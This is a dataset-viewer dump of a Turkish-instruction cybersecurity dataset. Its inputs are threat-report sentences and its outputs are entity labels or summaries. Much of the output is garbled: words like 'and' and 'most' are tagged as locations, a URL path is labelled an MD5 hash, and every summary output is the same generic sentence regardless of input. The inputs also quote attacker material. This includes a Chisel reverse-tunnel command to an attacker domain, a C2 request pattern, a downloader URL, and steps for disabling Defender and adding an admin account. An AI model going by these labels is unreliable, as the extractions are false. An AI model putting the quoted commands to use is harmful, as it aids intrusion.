instruction
stringclasses 2
values | input
stringlengths 3
5.01k
| output
stringlengths 10
5.79k
|
|---|---|---|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
The vulnerability status of AMD chips is unclear at the time of this writing.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Where once we only needed substreams to focus on threat actors such as China, Russia, and North Korea, TAG now has a dedicated analysis subteam dedicated to commercial vendors and operators.
|
location: China; location: Russia; location: North Korea; identity: TAG
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
MITRE ATT&CK Techniques Mapping Tactic Technique Resource Development Acquire Infrastructure: Web Services – T1583.006 Initial Access Phishing: Spearphishing Attachment – T1566.001 Phishing: Spearphishing Link – T1566.002 Execution Command and Scripting Interpreter: PowerShell – T1059.001
|
attack-pattern: Phishing; attack-pattern: Spearphishing Attachment; attack-pattern: Phishing; attack-pattern: Spearphishing Link; location: and; attack-pattern: Scripting; attack-pattern: PowerShell
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
This campaign started earlier today, and the malware uses the same techniques and even the same IOCs: And only added two new hostnames:
|
TIME: earlier today
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
In November 2018, we saw evidence that Sandworm shifted from using attacker-controlled accounts to try and upload malicious apps to compromising legitimate developers.
|
threat-actor: Sandworm; location: and
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
After gaining a foothold in the system, the dynamic data exchange (DDE) feature in Windows and legitimate cloud-based services will then be abused to deliver the malware or to establish command-and-control (C&C) communication.
|
SOFTWARE: Windows
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
The third version we found (5.1.2 rc1) reverts to a DLL file type but retains the C&C server.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Our reporting is consistent with earlier analysis produced by CitizenLab and Meta.
|
identity: CitizenLab; identity: Meta
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
This backdoor provided the attacker with complete access to the targeted organization’s network.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
It is important to remember that, except for the administrator user, all other accounts were used as part of the malware deployment (SLUB malware).
|
malware: SLUB
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
In our environment, we did not receive any payloads past this stage.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
After the data are collected, they are encrypted and sent to the (C&C) server.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Upon discovery, all identified websites and domains were added to Safe Browsing to protect users from further exploitation.
|
SOFTWARE: Safe Browsing
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
The parameters are then initialized.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
One of the most notable characteristics of APT35 is their impersonation of conference officials to conduct phishing attacks.
|
location: most; attack-pattern: phishing
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Phase 3: Triple extortion.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Under the Presidential Policy Directive (PPD) 41, the agency, together with the Federal Bureau of Investigation (FBI), and the Office of the Director of National Intelligence (ODNI), formed a Cyber Unified Coordination Group (UCG).
|
identity: Cyber Unified Coordination Group (UCG); identity: Federal Bureau of Investigation (FBI); identity: Office of the Director of National Intelligence (ODNI)
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
These attacks ultimately resulted in the investigation of the following two threats: Palo Alto Networks customers can use Xpanse or Threat Prevention for the Next-Generation Firewall to identify vulnerable and/or internet-facing instances of OctoberCMS.
|
identity: Palo Alto Networks; SOFTWARE: Xpanse; SOFTWARE: Threat Prevention; SOFTWARE: OctoberCMS
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Usually, they host a website for victims to input the identification key found in the ransom note, upload encrypted files for decryption – and pay the ransom.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
The implanted code begins when the DLL is loaded via DLL_PROCESS_ATTACH and performs the following at the DLLMain subroutine: The technique outlined above uses process injection via undocumented Windows NTAPI calls.
|
location: and; attack-pattern: process injection
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q1 2021.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Overview:
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Figure 25. Deploying malicious batch scripts to other endpoints The deployed batch script has the following commands: Disable Windows Update and Microsoft Defender Figure 26. Disable Microsoft defense services Prevents safeboot execution of security products Figure 27. Prevent security products’ execution Create new administrator account Figure 28. Create new account Add the AutoStart mechanism for the AvosLocker executable (update.exe) Figure 29. Add Autostart for ransomware executable Disables legal notice caption Figure 30. Disable legal notice Set safeboot with networking and disables Windows Error Recovery and reboot Figure 31. Setting and disabling network and specific Windows functions Conclusion
|
malware: AvosLocker; FILEPATH: update.exe; tools: Windows Update; tools: Microsoft Defender
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
We also observed some instances of injected payloads that were either trying to read authorized keys on vulnerable machines or were writing into the authorized_keys file to add to the machine’s list of accepted keys.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
This is used to build a connection between inter/intranet via Chisel: C:\WINDOWS\system32\ch.exe client https[:]//webadmin[.]mirrorstorage[.]org:443 r:127.0.0.1:47586:socks Exfiltration
|
URL: https[:]//webadmin[.]mirrorstorage[.]org:443; tools: Chisel; FILEPATH: C:\WINDOWS\system32\ch.exe
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
One of the secrets of Trend Micro’s long-lasting success is being constantly on the lookout for where the next security threats might come from.
|
identity: Trend Micro
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
The four exploits were used as a part of three different campaigns.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Host IOCs Registry Keys HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\KernelConfig HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DriverConfig HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SSL Update File Paths C:\Windows\System32\Nwsapagent.sys C:\Windows\System32\helpsvc.sys C:\ProgramData\USOShared\uso.bin C:\ProgramData\VMware\vmnat-update.bin C:\ProgramData\VirtualBox\update.bin
|
location: Host; REGISTRYKEY: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\KernelConfig; REGISTRYKEY: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DriverConfig; REGISTRYKEY: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SSL
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
References of MemoryProtection::HeapFree
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
This tool has a legitimate use: sites can and do notify users that they’re using the site visitors’ resources in this way to support the site, typically as a substitute for ads on the site.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Download our full paper here.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Another variant executes a set of commands once a system is successfully compromised.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Since last December, TA505 has been very active and has been using legitimate or compromised RATs (remote access trojans) such as FlawedAmmyy, FlawedGrace, and Remote Manipulator System (RMS).
|
location: and; location: remote; tools: FlawedAmmyy; malware: FlawedGrace; location: and; location: Remote; malware: RMS
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
As part of our efforts to combat serious threat actors, we use results of our research to improve the safety and security of our products.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
What is interesting is that this language ID is not determined by the Visual Studio current language.
|
SOFTWARE: Visual Studio
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Additionally, the Xpanse research team also found 1,251 end-of-life versions of the Confluence Server exposed on the public internet.
|
SOFTWARE: Confluence Server; identity: Xpanse research team
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
The user list, chat room names, and content of the applications were stored in a remote server without any authentication.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
The threat actors use a scheduled task command to spread and infect a victim's environment.
|
attack-pattern: scheduled task; location: and
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Within the Visual Studio Project would be source code for exploiting the vulnerability, as well as an additional DLL that would be executed through Visual Studio Build Events.
|
attack-pattern: source
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
The malware authors decided to use the EVP_SealInit() function.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Microsoft has publicly attributed the use of this custom malware to a threat actor they refer to as DEV-0586.
|
threat-actor: DEV-0586; identity: Microsoft
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Also, the file names involved in the decoding and loading of HyperBro are similar to those we witnessed during our investigation last year.
|
location: and; malware: HyperBro; location: are
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
The bad news is that this vulnerability is going to have a very long tail.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
This isn't to blame of the general public.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
N/A 0b94e123f6586967819fa247cdd58779b1120ef93fa1ea1de70dffc898054a09 Google Drivemonitor.exe keylogger
|
SHA2: 0b94e123f6586967819fa247cdd58779b1120ef93fa1ea1de70dffc898054a09
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
In addition, the application now retrieves the last known location and uses the development platform Google Firebase to upload the stolen content.
|
SOFTWARE: Google Firebase
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
This feature allows an intermediary Internet server to broker the connection, similar to a proxy server.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
On any given day, TAG is tracking more than 270 targeted or government-backed attacker groups from more than 50 countries.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
The targets would be prompted to install a legitimate version of McAfee anti-virus software from GitHub, while malware was simultaneously silently installed to the system.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
itxdrx(Net Manager): A component responsible for handling HTTP protocol communication.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Yu later demonstrated his research at CanSecWest in March.
|
identity: Yu
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
The ripple effect led other cybercriminal groups to lie low for the rest of the year.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Proper supply chain management processes allow contextualization, tracking, and monitoring of new vulnerabilities within different downstream software using a specific library such as DDS.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Mobile monetization platforms create software libraries that authors can embed into their apps to start earning money quickly.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
We remediated the compromises for these users and implemented controls to protect all Android users.
|
SOFTWARE: Android
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Weaponizing Open Source Software for Targeted Attacks
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
The following are the MITRE ATT&CK tactics and techniques associated with DarkSide.
|
threat-actor: DarkSide
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
ALIEN lives inside multiple privileged processes and receives commands from PREDATOR over IPC.
|
malware: ALIEN; location: and
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
JuneWe terminated 33 YouTube channels as part of our investigation into coordinated influence operations linked to Azerbaijan.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Figure 4 - Workbench models showing correlated events ready for further investigation.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Naively, what you need to do is read the cookie file in, add your data to what you’ve read, and write the file back to disk.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
In addition to implementing both mitigation techniques and proactive strategies, organizations can also strengthen their security by employing solutions such Trend Micro™ Deep Security™ and TippingPoint, which protects endpoints from threats that abuse vulnerabilities.
|
identity: Trend Micro; SOFTWARE: Deep Security; SOFTWARE: TippingPoint
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
If the link was not active, the user was redirected directly to a legitimate website.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
As announced today, Google has taken action to disrupt the operations of Glupteba, a multi-component botnet targeting Windows computers.
|
location: action; malware: Glupteba
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Every infected system is a profit-generating resource when mining Monero, and users are much less likely to identify their infection and remove the mining program than they would be with ransomware.
|
SOFTWARE: Monero
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Figure 13.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
You can also join in the discussion in our “About Threat and Vulnerability Discussions” on the Live Community.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
When employed, various techniques to bypass MFA are observed – from social engineering, through SIM-swapping and even compromising MFA/telecoms providers. Zero Trust network architecture and strong security hygiene are the best defenses against this type of threat actor.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
The new CveEventWrite function can be used to publish events when an attempt to exploit security vulnerabilities in user-mode applications occurs.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
In the age of work-from-home (WFH) during the pandemic, it’s possible that espionage is part of the reason that IoT devices are still major targets for advanced attackers.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
In March, we came across an email with a malware attachment that used the Gamaredon group’s tactics.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
On account-trading markets, hijacked channels ranged from $3 USD to $4,000 USD depending on the number of subscribers.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
GET http://{C2}/Index.php?vubc={identity} HTTP/1.1
|
URL: http://{C2}/Index.php?vubc={identity
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
One of APT35’s novel techniques involves using Telegram for operator notifications.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
This means more than 86% of Android users do not benefit from this enhancement and are vulnerable.
|
SOFTWARE: Android
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Figure 3. Malicious application for observing Ramadan Figure 4.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
For years, this group has hijacked accounts, deployed malware, and used novel techniques to conduct espionage aligned with the interests of the Iranian government.
|
identity: Iranian government
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
We’ll continue to take action, identify bad actors and share relevant information with others across industry and governments, with the goal of bringing awareness to these issues, protecting users and preventing future attacks.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Downloading only from legitimate app stores like Google Play can prevent Maikspy from compromising computers and mobile devices.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
9002 RAT also installed additional malicious tools: an exploit tool for Internet Information Services (IIS) 6 WebDav (exploiting CVE-2017-7269) and an SQL database password dumper.
|
malware: 9002 RAT; location: tool; location: and
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Figure 7.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
There are also other functionalities built-in to the components which were not directly accessed from the binaries included in the payload but may be used by additional stages which can be downloaded onto the victim's machine.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
We were able to get a copy of newsblog.js, which is a simple VBS downloader that communicates with the following URL: hxxp://23[.]95[.]215[.]100:8008/index.jsp/7e95a3d753cc4a17793ef9513e030b49/4t2Fg7k6wWRnKgd9 Figure 9.
|
MD5: index.jsp/7e95a3d753cc4a17793ef9513e030b49/4t2Fg7k6wWRnKgd9
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
FIN7 attacks can stage collected data in a particular location in preparation for exfiltration.
|
threat-actor: FIN7
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
IoT Company Wyze Leaks Emails, Device Data of 2.4M
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Common sense is the best defense against these types of abusive programs.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
The three vulnerabilities each contain code to alter a user-controlled address, and the code can be distilled down to the following operations:
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
These vendors operate with deep technical expertise to develop and operationalize exploits.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
As the OpenSSL library is so widely used, some administrators may be finding unpatched systems for years to come.
|
SOFTWARE: OpenSSL library
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
It then changes the port number of the HTTP server inside the configuration file and starts the Everything process, which will open an HTTP server to allow the threat actor to access the file system of the victim.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Unfortunately, many app developers in the Google Play Store have ignored these concerns in favor of convenience.
|
SOFTWARE: Google Play Store
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Since the detection result is fake, the subsequent cleaning is not real either – the elimination operation is just marking a flag of "initial_virus_cleared" to “1” in the app’s internal database.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
For these devices, take time to configure individual user profiles as much as possible.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
This shows that the actor is actively involved in the development of APK versions of the backdoor.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
We consider these appropriate given the variety of tactics that Russian actors have used in the past.
|
identity: Russian actors
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Whenever a tool is used, the attacker deletes it from the disk as soon as it has done its purpose – which usually does not last for more than 15 minutes.
|
location: tool; TIME: more than 15 minutes
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
The trigger format is: %system32/rundll32.exe <PROTUX file name> <export name>.
|
FILEPATH: %system32/rundll32.exe
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
At this point, the remote server will respond with an unencrypted file that the malware saves to the system.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.